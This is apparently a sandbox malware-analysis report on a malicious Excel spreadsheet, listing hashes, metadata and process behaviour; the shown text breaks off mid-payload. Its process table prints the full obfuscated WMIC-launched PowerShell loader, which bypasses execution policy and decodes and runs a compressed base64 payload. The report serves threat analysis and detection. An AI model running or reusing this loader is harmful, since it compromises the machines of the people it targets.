analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | MIL0001537426.xls |
| Full analysis: | https://app.any.run/tasks/dcd07c36-7b14-4296-a080-058f39a7b5ec |
| Verdict: | Malicious activity |
| Analysis date: | September 11, 2019, 07:30:47 |
| OS: | Windows 10 Professional (build: 16299, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.ms-excel |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Sep 9 09:33:00 2019, Last Saved Time/Date: Mon Sep 9 09:37:00 2019, Security: 0 |
| MD5: | F564E32039FD930A7688A7325B3EC5FB |
| SHA1: | 2526A64145F814F8C1760A531F22DE3CF8F4A4CF |
| SHA256: | 4BB516D3E5546A1EE287ABE9A2B6FA3FBEF3B6092A49EDF13D2BB19CC1C00850 |
| SSDEEP: | 1536:zP5HNfeQuP8mo1X9rlnSYYcMA+eIFAlYkRIbTkKBEqEXugsCZmbpoahZhC0cixI9:zP5HNfeQu8mo1X9rlnSYYcMA+eIFAlYu |
MALICIOUS
Scans artifacts that could help determine the target
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Unusual execution from Microsoft Office
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Loads the Task Scheduler DLL interface
- mmc.exe (PID: 4756)
Loads the Task Scheduler COM API
- mmc.exe (PID: 4756)
SUSPICIOUS
Reads Environment values
- EXCEL.EXE (PID: 5580)
- powershell.exe (PID: 2692)
- powershell.exe (PID: 3404)
- powershell.exe (PID: 1948)
- powershell.exe (PID: 5396)
- EXCEL.EXE (PID: 2736)
- POWeRsHEll.exe (PID: 556)
- powershell.exe (PID: 3848)
- powershell.exe (PID: 580)
- powershell.exe (PID: 1924)
- powershell.exe (PID: 3420)
- powershell.exe (PID: 5348)
- POWeRsHEll.exe (PID: 2504)
Reads mouse settings
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Uses WMIC.EXE to create a new process
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Executed via WMI
- POWeRsHEll.exe (PID: 556)
- POWeRsHEll.exe (PID: 2504)
PowerShell script executed
- POWeRsHEll.exe (PID: 556)
- POWeRsHEll.exe (PID: 2504)
Executes PowerShell scripts
- POWeRsHEll.exe (PID: 556)
- POWeRsHEll.exe (PID: 2504)
Reads the machine GUID from the registry
- powershell.exe (PID: 2692)
- powershell.exe (PID: 5396)
- powershell.exe (PID: 1084)
- powershell.exe (PID: 3404)
- powershell.exe (PID: 1948)
- POWeRsHEll.exe (PID: 556)
- cvtres.exe (PID: 4200)
- powershell.exe (PID: 5348)
- powershell.exe (PID: 3848)
- csc.exe (PID: 5724)
- powershell.exe (PID: 1924)
- powershell.exe (PID: 3420)
- powershell.exe (PID: 580)
- POWeRsHEll.exe (PID: 2504)
- cvtres.exe (PID: 3740)
- mmc.exe (PID: 4756)
- csc.exe (PID: 1580)
Application launched itself
- POWeRsHEll.exe (PID: 556)
- POWeRsHEll.exe (PID: 2504)
INFO
Creates files in the user directory
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Reads the software policy settings
- EXCEL.EXE (PID: 5580)
- POWeRsHEll.exe (PID: 556)
- powershell.exe (PID: 2692)
- powershell.exe (PID: 3404)
- powershell.exe (PID: 1084)
- powershell.exe (PID: 5396)
- powershell.exe (PID: 1948)
- EXCEL.EXE (PID: 2736)
- POWeRsHEll.exe (PID: 2504)
- powershell.exe (PID: 580)
- powershell.exe (PID: 5348)
- powershell.exe (PID: 1924)
- powershell.exe (PID: 3848)
- powershell.exe (PID: 3420)
Reads settings of System Certificates
- EXCEL.EXE (PID: 5580)
- POWeRsHEll.exe (PID: 556)
- powershell.exe (PID: 1084)
- powershell.exe (PID: 5396)
- powershell.exe (PID: 3404)
- powershell.exe (PID: 1948)
- powershell.exe (PID: 2692)
- EXCEL.EXE (PID: 2736)
- POWeRsHEll.exe (PID: 2504)
- powershell.exe (PID: 1924)
- powershell.exe (PID: 580)
- powershell.exe (PID: 3420)
- powershell.exe (PID: 3848)
- powershell.exe (PID: 5348)
Reads the machine GUID from the registry
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Reads Microsoft Office registry keys
- EXCEL.EXE (PID: 5580)
- EXCEL.EXE (PID: 2736)
Manual execution by user
- EXCEL.EXE (PID: 2736)
- mmc.exe (PID: 248)
- mmc.exe (PID: 4756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .xls | | | Microsoft Excel sheet (78.9) |
|---|
EXIF
FlashPix
| CompObjUserType: | Foglio di lavoro di Microsoft Excel 2003 |
|---|---|
| CompObjUserTypeLen: | 41 |
| HeadingPairs: |
|
| TitleOfParts: | allegati |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| Company: | - |
| CodePage: | Windows Latin 1 (Western European) |
| Security: | None |
| ModifyDate: | 2019:09:09 08:37:00 |
| CreateDate: | 2019:09:09 08:33:00 |
| Software: | Microsoft Excel |
| LastModifiedBy: | - |
| Author: | - |
Total processes
135
Monitored processes
36
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 5580 | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\MIL0001537426.xls" | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 16.0.11328.20158 | ||||
| 5432 | wMIc 'pRoCEss' 'CALL' "cREate" "POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX" | C:\WINDOWS\System32\Wbem\wMIc.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 2864 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | wMIc.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) | ||||
| 556 | POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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